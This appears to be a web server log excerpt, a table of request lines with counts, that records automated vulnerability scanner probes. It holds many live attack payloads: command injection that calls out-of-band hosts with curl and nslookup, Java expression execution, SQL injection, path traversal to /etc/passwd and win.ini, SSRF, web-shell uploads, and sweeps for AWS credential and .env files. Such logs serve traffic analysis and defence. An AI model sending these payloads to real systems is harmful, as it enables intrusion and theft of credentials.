589 | 4 | GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22bnNsb29rdXAgZDBvcjFqM2pra24xcThkYWJkNzBqOWVyOGhjbjgzZWRqLm9hc3Qub25saW5l%22))) HTTP/1.1 |
592 | 4 | POST /gremlin HTTP/1.1 |
593 | 4 | POST /app/rest/users/id:1/tokens/2xXafmdV8TCH2qFVw2wRmNwVZgx;.jsp?jsp_precompile=true HTTP/1.1 |
594 | 4 | GET /wbabt.txt HTTP/1.1 |
599 | 4 | GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,504b032ee5825d3283f82297426c7f35,0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1 |
603 | 4 | POST /dana-na/auth/saml-sso.cgi HTTP/1.1 |
605 | 4 | GET /importexport.php?sql=c2VsZWN0KzksbWQ1KDk4Njk1NjgpLDk=&type=exportexcelbysql HTTP/1.1 |
618 | 4 | POST /admin/pr_monitor/getting_index_data.php HTTP/1.1 |
625 | 4 | GET /Admin/index.php HTTP/1.1 |
626 | 4 | POST /Admin/login.php HTTP/1.1 |
630 | 4 | GET /index.php?noAUTO=1 HTTP/1.1 |
633 | 4 | GET /wp-json/lp/v1/load_content_via_ajax/?callback={\x22class\x22%3a\x22LP_Debug\x22,\x22method\x22%3a\x22var_dump\x22}&args=\x222xXafIv58n57jETMYoSbwl333Ue\x22 HTTP/1.1 |
640 | 4 | GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1 |
641 | 4 | GET /model-versions/get-artifact?path=random&name=sMaJxE&version=2 HTTP/1.1 |
642 | 4 | GET /wp-json/lp/v1/courses/archive-course?order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1 |
643 | 4 | POST /3/ParseSetup HTTP/1.1 |
644 | 4 | GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1 |
646 | 4 | GET /nodes?view=summary HTTP/1.1 |
654 | 4 | GET /52uBX/CVE-2023-47246.txt?true HTTP/1.1 |
655 | 4 | POST /userentry?accountId=/../../../tomcat/webapps/52uBX/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1 |
657 | 4 | GET /user/login/ HTTP/1.1 |
659 | 4 | GET /api/clusters HTTP/1.1 |
660 | 4 | POST /dana-ws/saml20.ws HTTP/1.1 |
661 | 4 | GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20d0or1j3jkkn1q8dabd70qujy3eqonjnnr.oast.online HTTP/1.1 |
662 | 4 | GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 |
663 | 4 | GET /xstoremgwt/cheetahImages?imageId=..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1 |
664 | 4 | GET /queue/data?session_hash=2xXagjpQbnS8SaNY4t7cXCX9gtM HTTP/1.1 |
667 | 4 | POST /queue/join HTTP/1.1 |
668 | 4 | POST /component_server HTTP/1.1 |
671 | 4 | GET /?__wpdmxp=%27][/wpdm_package][wpdm_all_packages][wpdm_package%20id=%27 HTTP/1.1 |
679 | 4 | GET /home/xgvay.php HTTP/1.1 |
681 | 4 | GET /model-versions/get-artifact?name=2xXag0DHjbkIiVqU6g6wdnGTxvu&path=etc%2Fpasswd&version=1 HTTP/1.1 |
687 | 4 | GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1 |
692 | 4 | GET /common/snqpu.txt HTTP/1.1 |
693 | 4 | POST /webtools/control/forgotPassword/xmldsdump HTTP/1.1 |
698 | 4 | POST /openam/json/realms/root/authenticate HTTP/1.1 |
701 | 4 | POST /management/export.php?filename=$(echo+’’+>+fvengvbwqjex.php)&type=pdf HTTP/1.1 |
710 | 4 | GET /Login.aspx HTTP/1.1 |
716 | 4 | GET /?–configPath=/nuclei_test/4406259714 HTTP/1.1 |
718 | 4 | POST /chat/completions HTTP/1.1 |
720 | 4 | GET /service-worker.js?local_access_token=2xXagqs0ap6E0KaAyiQOmwI9rEa HTTP/1.1 |
723 | 4 | GET /-/media/doo-doo.ashx HTTP/1.1 |
726 | 4 | GET /~projects HTTP/1.1 |
728 | 4 | POST /api/v2/templates/ HTTP/1.1 |
737 | 4 | POST /cgi-bin/skk_get.cgi HTTP/1.1 |
738 | 4 | GET /toolbox-resource/../serverconfig.xml HTTP/1.1 |
740 | 4 | POST /api/v2/observables/extended HTTP/1.1 |
742 | 4 | GET /javadoc/releases/javadoc/1.0.0//raw/..%5c..%2f..%2f..%2f..%2f..%2freposilite.db HTTP/1.1 |
745 | 4 | GET /W6wlQx.txt HTTP/1.1 |
753 | 4 | GET /html/usr/share/doc/hostname/copyright%3f HTTP/1.1 |
768 | 4 | GET /cpanel.php HTTP/1.1 |
769 | 4 | GET /bin/cron.php HTTP/1.1 |
770 | 4 | GET /cache/index.tpl.php HTTP/1.1 |
771 | 4 | POST /api/v1/livechat/sms-incoming/twilio HTTP/1.1 |
772 | 4 | GET /en-US/login HTTP/1.1 |
780 | 4 | GET /mailinspector/login.php HTTP/1.1 |
787 | 4 | GET /controlloLogin.js HTTP/1.1 |
788 | 4 | GET /realms/master/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri=http%3A%2F%2fxxx.xxx.xxx.xxx%2Fadmin%2Fmaster%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge=wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto HTTP/1.1 |
791 | 4 | POST /api/gen/clients/csharp HTTP/1.1 |
792 | 4 | POST /include/file.php HTTP/1.1 |
795 | 4 | POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1 |
807 | 4 | GET /chaosblade?cmd=$(id) HTTP/1.1 |
810 | 4 | GET /api/subscriber HTTP/1.1 |
812 | 4 | POST /api/v2/open/rowsInfo HTTP/1.1 |
813 | 4 | GET /rest/api/latest/repos HTTP/1.1 |
814 | 4 | GET /login.zul HTTP/1.1 |
819 | 4 | GET /404%0dnew-header:value%0da: HTTP/1.1 |
838 | 4 | GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1 |
839 | 4 | GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1 |
841 | 4 | GET /cgi-bin/ExportLogs.sh HTTP/1.1 |
842 | 4 | GET /wp-content/uploads/cfom_files/2xxagq14eba7wpm4ytahpa571zi.php HTTP/1.1 |
843 | 4 | GET /?phonepe_action=curltestPhonePe&url=http://d0or1j3jkkn1q8dabd70xhjz6ak398ep5.oast.online HTTP/1.1 |
844 | 4 | POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami .d0or1j3jkkn1q8dabd70maa1okkw7uue6.oast.online) HTTP/1.1 |
847 | 4 | POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=2xXagq14ebA7wPM4ytahPA571zI.pHp HTTP/1.1 |
852 | 4 | POST /ubus/ HTTP/1.1 |
854 | 4 | POST /admin/asign-single-student-subjects.php HTTP/1.1 |
855 | 4 | GET /2xXafVU2X3os24t7U4ZiPgtUkcW.jsp HTTP/1.1 |
862 | 4 | GET /index.php/video/?dl=aHR0cHM6Ly9vYXN0Lm1lLw== HTTP/1.1 |
863 | 4 | GET /api/get-browser-snapshot?snapshot_path=/etc/passwd HTTP/1.1 |
865 | 4 | POST /alerts/alertConfigField.php HTTP/1.1 |
867 | 4 | POST /alerts/alertLightbox.php HTTP/1.1 |
868 | 4 | GET /2xXagqGHG6rH72T2vsrWn0RYvLY HTTP/1.1 |
869 | 4 | GET /cgi-bin/downloadFlile.cgi?payload=ls>../2xXagqGHG6rH72T2vsrWn0RYvLY HTTP/1.1 |
873 | 4 | POST /modules/appagebuilder/apajax.php?rand=2022457874423 HTTP/1.1 |
874 | 4 | GET /api/2xXafqrnKozWkw5AnJwUkioa5fM HTTP/1.1 |
875 | 4 | GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d0or1j3jkkn1q8dabd70b5ro5xokjga41.oast.online%22%29%7D/ HTTP/1.1 |
876 | 4 | GET /delsnap.pl?name= |
877 | 4 | POST /hms/admin/ HTTP/1.1 |
879 | 4 | POST /templates/default/html/windows/right.php HTTP/1.1 |
880 | 4 | GET /set_safety.shtml?r=52300 HTTP/1.1 |
881 | 4 | GET /admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5–+ HTTP/1.1 |
882 | 4 | GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5(999999999),8,9,10,11–+ HTTP/1.1 |
883 | 4 | GET /sysinit.shtml?r=52300 HTTP/1.1 |
884 | 4 | GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10–+ HTTP/1.1 |
886 | 4 | GET /booking.php?car_id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10–+ HTTP/1.1 |
887 | 4 | GET /admin/index.php?page=home HTTP/1.1 |
893 | 4 | GET /live_check.shtml HTTP/1.1 |
894 | 4 | GET /authenticationendpoint/2xxafwgwdo4igbwcgodrsm5alyf.jsp HTTP/1.1 |
902 | 4 | GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1 |
903 | 4 | GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1 |
911 | 4 | GET /asyncrenderer/%7B%7Burl%7D%7D?clientId={{id}}&timeout=500&wiki=xwiki HTTP/1.1 |
912 | 4 | GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1 |
915 | 4 | POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1 |
927 | 4 | GET /_images/qidPCO HTTP/1.1 |
929 | 4 | POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272xXagYhPcaaf6BwG8HRDOpJGBee%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+IpAddress=%2789.39.121.48%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272xXagYhPcaaf6BwG8HRDOpJGBee%27%23 HTTP/1.1 |
930 | 4 | GET /api/v1/cav/client/status/../../admin/options HTTP/1.1 |
932 | 4 | GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1 |
933 | 4 | GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://d0or1j3jkkn1q8dabd70tj69w3qe3uwu7.oast.online/patrowl.svg HTTP/1.1 |
937 | 4 | POST /wp-job-portal-jobseeker-controlpanel/jobs HTTP/1.1 |
940 | 4 | POST /api/sys/login HTTP/1.1 |
943 | 4 | POST /cmisatom/cmis-online/query HTTP/1.1 |
944 | 4 | POST /models?url=http%3a//d0or1j3jkkn1q8dabd705shtiwn56zxem.oast.online HTTP/1.1 |
945 | 4 | POST /opencms/cmisatom/cmis-online/query HTTP/1.1 |
947 | 4 | POST /api/sys/set_passwd HTTP/1.1 |
951 | 4 | GET /KDemDzZ5K9.php HTTP/1.1 |
957 | 4 | POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1 |
963 | 4 | POST /api/2.0/mlflow/model-versions/create HTTP/1.1 |
964 | 4 | GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1 |
965 | 4 | POST /api/2.0/mlflow/registered-models/create HTTP/1.1 |
968 | 4 | POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1 |
971 | 4 | POST /api/jmeter/download/files HTTP/1.1 |
972 | 4 | GET /forms/doLogin?login_username=admin&password=password$(curl%20d0or1j3jkkn1q8dabd70pe1f3jpet6e6y.oast.online)&x=0&y=0 HTTP/1.1 |
975 | 4 | POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 |
977 | 4 | GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2xXafHKbJge9RMdNzqHyS88K70p HTTP/1.1 |
979 | 4 | GET /api/auth/cognito/callback?access_token=xdtmfulh&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJjb2duaXRvOnVzZXJuYW1lIjoiaWpocm5la3FqZSIsImVtYWlsIjoie3tlbWFpbH19In0=. HTTP/1.1 |
980 | 4 | POST /spcgi.cgi HTTP/1.1 |
984 | 4 | POST /api/v1/snapshots HTTP/1.1 |
985 | 4 | GET /sreczyl HTTP/1.1 |
986 | 4 | POST /goform/aspForm HTTP/1.1 |
987 | 4 | POST /ajax.php?action=save_user HTTP/1.1 |
988 | 4 | GET /2xXagAsXZSYOyfzioJZIv0W2Jbi.jsp HTTP/1.1 |
991 | 4 | POST /api/router/mesh/status HTTP/1.1 |
992 | 4 | GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).d0or1j3jkkn1q8dabd70o8xqa8z1jcan9.oast.online%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22xxx.xxx.xxx.xxx%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1 |
993 | 4 | GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://d0or1j3jkkn1q8dabd701mbbk3rgqwaj1.oast.online/ HTTP/1.1 |
995 | 4 | POST /v1/warehouse/pending-events HTTP/1.1 |
997 | 4 | GET /2xXag7oxOkzB1uqVziE6Fo4Lo4X HTTP/1.1 |
1000 | 4 | POST //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 |
1004 | 4 | POST /cfusion/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 |
1006 | 4 | POST /CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 |
1008 | 4 | POST /minio/bootstrap/v1/verify HTTP/1.1 |
1071 | 2 | PATCH /mgmt/tm/auth/user/xQEGM HTTP/1.1 |
1082 | 1 | GET /app/Providers/AwsServiceProvider.php HTTP/1.1 |
1085 | 1 | GET /apps/config/aws_parameters.yml HTTP/1.1 |
1089 | 1 | GET /assets/css/style.css HTTP/1.1 |
1090 | 1 | GET /assets/js/app.js HTTP/1.1 |
1091 | 1 | GET /assets/js/aws-config.js HTTP/1.1 |
1103 | 1 | GET /api/signin HTTP/1.1 |
1104 | 1 | GET /api/signup HTTP/1.1 |
1108 | 1 | GET /api/reset HTTP/1.1 |
1109 | 1 | GET /api/session HTTP/1.1 |
1110 | 1 | GET /api/settings.json HTTP/1.1 |
1116 | 1 | GET /admin/debug.php HTTP/1.1 |
1118 | 1 | GET /admin/logs/error.log HTTP/1.1 |
1120 | 1 | GET /admin/sysadmin/index.php HTTP/1.1 |
1121 | 1 | GET /app/Secrets/AWSKeys.php HTTP/1.1 |
1127 | 1 | GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1 |
1131 | 1 | GET /.prettierrc.json HTTP/1.1 |
1132 | 1 | GET /.python-version HTTP/1.1 |
1134 | 1 | GET /.rvmrc HTTP/1.1 |
1138 | 1 | GET /app/aws/credentials.php HTTP/1.1 |
1142 | 1 | GET /app/config/aws.php HTTP/1.1 |
1143 | 1 | GET /app/Config/aws_sdk.php HTTP/1.1 |
1144 | 1 | GET /app/config/cloud/aws.php HTTP/1.1 |
1145 | 1 | GET /app/config/services/aws.php HTTP/1.1 |
1147 | 1 | GET /app/etc/config.php HTTP/1.1 |
1151 | 1 | GET /api/password HTTP/1.1 |
1156 | 1 | GET /api/authenticate HTTP/1.1 |
1157 | 1 | GET /api/aws/credentials.json HTTP/1.1 |
1158 | 1 | GET /api/config.php HTTP/1.1 |
1159 | 1 | GET /api/config/aws.php HTTP/1.1 |
1160 | 1 | GET /api/debug.php HTTP/1.1 |
1161 | 1 | GET /api/forgot HTTP/1.1 |
1164 | 1 | GET /api/logout HTTP/1.1 |
1165 | 1 | GET /api/logs/error.log HTTP/1.1 |
1174 | 1 | GET /config.php.inc~ HTTP/1.1 |
1177 | 1 | GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20d0or1j3jkkn1q8dabd70cp3pg75a874tf.oast.online%20-H%20’User-Agent%3a%20uHRuvD’; HTTP/1.1 |
1183 | 1 | GET /browse.php HTTP/1.1 |
1185 | 1 | GET /cgi-bin/1.php HTTP/1.1 |
1186 | 1 | GET /check-site.php HTTP/1.1 |
1192 | 1 | GET /data/aws-creds.yml HTTP/1.1 |
1193 | 1 | GET /data/config.env HTTP/1.1 |
1194 | 1 | PUT /v1/agent/check/register HTTP/1.1 |
1195 | 1 | PUT /v1/agent/check/deregister/2xXagoujux6oT9ALK1SK3dyfiRw HTTP/1.1 |
1196 | 1 | GET /config/aws-credentials.php HTTP/1.1 |
1199 | 1 | GET /config/aws_config.php HTTP/1.1 |
1201 | 1 | GET /config/aws_settings.php HTTP/1.1 |
1203 | 1 | GET /config/cloud/aws_config.json HTTP/1.1 |
1204 | 1 | GET /config/cloud/aws_keys.php HTTP/1.1 |
1206 | 1 | GET /config/test.config.php HTTP/1.1 |
1207 | 1 | GET /configs/app.env HTTP/1.1 |
1208 | 1 | GET /configs/db.env HTTP/1.1 |
1209 | 1 | GET /configs/mail/smtp.php HTTP/1.1 |
1210 | 1 | GET /configs/prod.env HTTP/1.1 |
1211 | 1 | GET /configs/staging.env HTTP/1.1 |
1212 | 1 | GET /config/aws_sdk_settings.php HTTP/1.1 |
1215 | 1 | GET /.stylelintrc.json HTTP/1.1 |
1216 | 1 | GET /authenticate HTTP/1.1 |
1217 | 1 | GET /aws-config.json HTTP/1.1 |
1218 | 1 | GET /aws-credentials.json HTTP/1.1 |
1222 | 1 | GET /aws/aws_secret_config.php HTTP/1.1 |
1224 | 1 | GET /aws/config/aws_auth.php HTTP/1.1 |
1225 | 1 | GET /aws/credentials.bak HTTP/1.1 |
1226 | 1 | GET /aws/creds/aws_keys.yml HTTP/1.1 |
1227 | 1 | GET /aws/env/aws_env_config.json HTTP/1.1 |
1228 | 1 | GET /aws/keys.conf HTTP/1.1 |
1235 | 1 | GET /aws/aws_settings.json HTTP/1.1 |
1244 | 1 | GET /aws_data/aws_keys.yml HTTP/1.1 |
1245 | 1 | GET /aws_settings/aws_keys.php HTTP/1.1 |
1251 | 1 | GET /backend/aws_credentials.json HTTP/1.1 |
1254 | 1 | GET /backend/logs/access.log HTTP/1.1 |
1272 | 1 | PUT /mdm/checkin HTTP/1.1 |
1273 | 1 | GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1 |
1281 | 1 | DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1 |
1291 | 1 | PUT /goform/AccessControl HTTP/1.1 |
1328 | 1 | PUT /api/v2/simulation HTTP/1.1 |
1349 | 1 | GET /../../../../etc/passwd HTTP/1.1 |
1358 | 1 | PUT /api/2.0/mlflow-artifacts/artifacts/2xXagLt7BvY4ycVqNxvXhgEvQWD HTTP/1.1 |
1364 | 1 | GET /.debug HTTP/1.1 |
1365 | 1 | GET /.debugbar HTTP/1.1 |
1370 | 1 | GET /.tool-versions HTTP/1.1 |
1371 | 1 | GET /16.php HTTP/1.1 |
1372 | 1 | GET /2phpmyadmin/index.php HTTP/1.1 |
1386 | 1 | GET /.eslintrc HTTP/1.1 |
1387 | 1 | GET /.eslintrc.json HTTP/1.1 |
1389 | 1 | GET /.git/objects/pack/pack-*.idx HTTP/1.1 |
1390 | 1 | GET /.github/workflows/ci.yml HTTP/1.1 |
1398 | 1 | GET /oauth/idp/.well-known/openid-configuration HTTP/1.1 |
1452 | 1 | GET /symfony/app_dev.php HTTP/1.1 |
1453 | 1 | GET /symfony/config_dev.php HTTP/1.1 |
1454 | 1 | GET /symfony/phpinfo.php HTTP/1.1 |
1455 | 1 | GET /symlink403.php HTTP/1.1 |
1458 | 1 | GET /signup HTTP/1.1 |
1462 | 1 | GET /sites/default/settings.bak.php HTTP/1.1 |
1477 | 1 | GET /test-php-version.php HTTP/1.1 |
1488 | 1 | GET /tmp/config.php HTTP/1.1 |
1494 | 1 | GET /secrets/aws_keys.json HTTP/1.1 |
1496 | 1 | GET /secure/aws_secrets.py HTTP/1.1 |
1498 | 1 | GET /server/aws_auth.php HTTP/1.1 |
1499 | 1 | GET /server/config.php HTTP/1.1 |
1501 | 1 | GET /server/logs/debug.log HTTP/1.1 |
1503 | 1 | GET /sites/default/settings.old.php HTTP/1.1 |
1506 | 1 | GET /react_app/src/aws-config.js HTTP/1.1 |
1508 | 1 | GET /register HTTP/1.1 |
1509 | 1 | GET /reset HTTP/1.1 |
1510 | 1 | GET /resources/aws.yml HTTP/1.1 |
1511 | 1 | GET /resources/aws_config.yml HTTP/1.1 |
1512 | 1 | GET /resources/config/aws_settings.json HTTP/1.1 |
1513 | 1 | GET /resources/env.dev HTTP/1.1 |
1514 | 1 | GET /resources/env.example HTTP/1.1 |
1515 | 1 | GET /resources/env.local HTTP/1.1 |
1516 | 1 | GET /server/settings.json HTTP/1.1 |
1519 | 1 | GET /src/aws/credentials.json HTTP/1.1 |
1520 | 1 | GET /src/config/aws_keys.py HTTP/1.1 |
1521 | 1 | GET /src/secrets/aws.yml HTTP/1.1 |
1522 | 1 | GET /src/secrets/aws_config.php HTTP/1.1 |
1525 | 1 | GET /serverless/aws-config.yml HTTP/1.1 |
1527 | 1 | GET /services/aws/config.php HTTP/1.1 |
1528 | 1 | GET /services/aws_keys.json HTTP/1.1 |
1529 | 1 | GET /search/s.php HTTP/1.1 |
1530 | 1 | GET /settings.back HTTP/1.1 |
1531 | 1 | GET /settings.debug HTTP/1.1 |
1532 | 1 | GET /settings.dev.php HTTP/1.1 |
1533 | 1 | GET /settings.env HTTP/1.1 |
1538 | 1 | GET /settings.yaml HTTP/1.1 |
1540 | 1 | GET /settings/aws_secrets.yml HTTP/1.1 |
1541 | 1 | GET /routes/api.php.bak HTTP/1.1 |
1542 | 1 | GET /routes/channels.php.bak HTTP/1.1 |
1544 | 1 | PUT /poc.jsp/ HTTP/1.1 |
1545 | 1 | PUT /2xXag5Aum3Ax283t9kbD3DVqF8V.jsp/ HTTP/1.1 |
1549 | 1 | GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1 |
1550 | 1 | GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1 |
1551 | 1 | GET /wp-includes/customize/autoload_classmap.php HTTP/1.1 |
1552 | 1 | GET /wp/wp-config.backup.php HTTP/1.1 |
1553 | 1 | GET /wp/wp-config.php.c HTTP/1.1 |
1554 | 1 | GET /wp/wp-config.php.staging HTTP/1.1 |
1555 | 1 | GET /wso403.php HTTP/1.1 |
1558 | 1 | GET /debug/ HTTP/1.1 |
1560 | 1 | GET /_error HTTP/1.1 |
1562 | 1 | GET /_profiler HTTP/1.1 |
1565 | 1 | GET /_wdt HTTP/1.1 |
1567 | 1 | GET /2xXagkHxtKg2bcEcC4m2WVHm6An/../../ThinVnc.ini HTTP/1.1 |
1578 | 1 | PUT /nexus/service/local/repositories/releases/content/com/sbt/ignite/ignite-bom/maven-metadata.xml HTTP/1.1 |
1582 | 1 | PUT /fileserver/2xXagyJ5gasVQd9JvjilKU9CR5j.txt HTTP/1.1 |
1594 | 1 | PUT /meta HTTP/1.1 |
1598 | 1 | GET /webpack.config.ts HTTP/1.1 |
1599 | 1 | GET /website-test.php HTTP/1.1 |
1601 | 1 | GET /wordpress/wp-config.php.b HTTP/1.1 |
1602 | 1 | GET /wordpress/wp-config.php.bak HTTP/1.1 |
1603 | 1 | POST /-/jira/login/oauth/access_token HTTP/1.1 |
1604 | 1 | GET /tmp/env HTTP/1.1 |
1605 | 1 | GET /tmp/env.bak HTTP/1.1 |
1606 | 1 | GET /tmp/env.save HTTP/1.1 |
1607 | 1 | GET /tmp/error.log HTTP/1.1 |
1613 | 1 | GET /uploads/upload.form.php HTTP/1.1 |
1618 | 1 | GET /var/log/exception.log HTTP/1.1 |
1623 | 1 | GET /wordpress/wp-config.php.original HTTP/1.1 |
1625 | 1 | GET /wp-admin/css/colors/cloud.php HTTP/1.1 |
1637 | 1 | GET /wp-content/themes/astra/inc/network.php HTTP/1.1 |
1638 | 1 | GET /wp-includes/block-supports/wp-conflg.php HTTP/1.1 |
1639 | 1 | PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 |
1640 | 1 | GET /var/www/phpinfo.php HTTP/1.1 |
1643 | 1 | GET /verification.php HTTP/1.1 |
1647 | 1 | GET /web/aws/credentials.php HTTP/1.1 |
1648 | 1 | GET /web/environment.php HTTP/1.1 |
1650 | 1 | GET /forgot HTTP/1.1 |
1656 | 1 | GET /frontend/static/aws-config.js HTTP/1.1 |
1657 | 1 | GET /gallery/zp-core/setup/index.php HTTP/1.1 |
1658 | 1 | GET /h.php HTTP/1.1 |
1662 | 1 | GET /resources/env.prod HTTP/1.1 |
1663 | 1 | GET .//WEB-INF/web.xml HTTP/1.1 |
1664 | 1 | GET .//WEB-INF/weblogic.xml HTTP/1.1 |
1667 | 1 | GET /dev/settings.debug HTTP/1.1 |
1668 | 1 | GET /dev/settings.dev HTTP/1.1 |
1669 | 1 | GET /dev/settings.local HTTP/1.1 |
1673 | 1 | GET /docker-compose.override.yml HTTP/1.1 |
1676 | 1 | POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 |
1677 | 1 | GET /file/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 |
1678 | 1 | GET /file/../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1 |
1682 | 1 | GET /include/mail.php HTTP/1.1 |
1685 | 1 | GET /index_dev.php HTTP/1.1 |
1686 | 1 | GET /info.php.1 HTTP/1.1 |
1691 | 1 | GET /infra/aws_creds.yml HTTP/1.1 |
1692 | 1 | GET /infrastructure/aws_keys.json HTTP/1.1 |
1694 | 1 | GET /internal/aws/creds.json HTTP/1.1 |
1695 | 1 | PUT /2xXafNONYWEwvWczbdmQV8uhXdK.txt HTTP/1.1 |
1696 | 1 | PUT /cgi-bin/2FtrEb.txt HTTP/1.1 |
1697 | 1 | PUT /cgi-bin/cf1PXB.txt HTTP/1.1 |
1698 | 1 | DELETE /cgi-bin/cf1PXB.txt HTTP/1.1 |
1699 | 1 | GET /environment.yml HTTP/1.1 |
1702 | 1 | GET /info03.php HTTP/1.1 |
1706 | 1 | GET /debugbar HTTP/1.1 |
1710 | 1 | GET /deploy/aws_secrets.yml HTTP/1.1 |
1716 | 1 | GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1 |
1719 | 1 | GET /configuration/aws_keys.yml HTTP/1.1 |
1720 | 1 | GET /configuration/cloud/aws.yml HTTP/1.1 |
1722 | 1 | GET /containers/aws_creds.json HTTP/1.1 |
1724 | 1 | GET /core/aws/keys.php HTTP/1.1 |
